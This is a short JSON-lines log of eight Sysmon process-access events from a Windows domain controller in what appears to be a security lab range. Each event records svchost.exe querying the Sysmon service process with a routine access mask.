{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1344,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1345,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1346,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1347,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1348,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1349,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1350,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1351,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
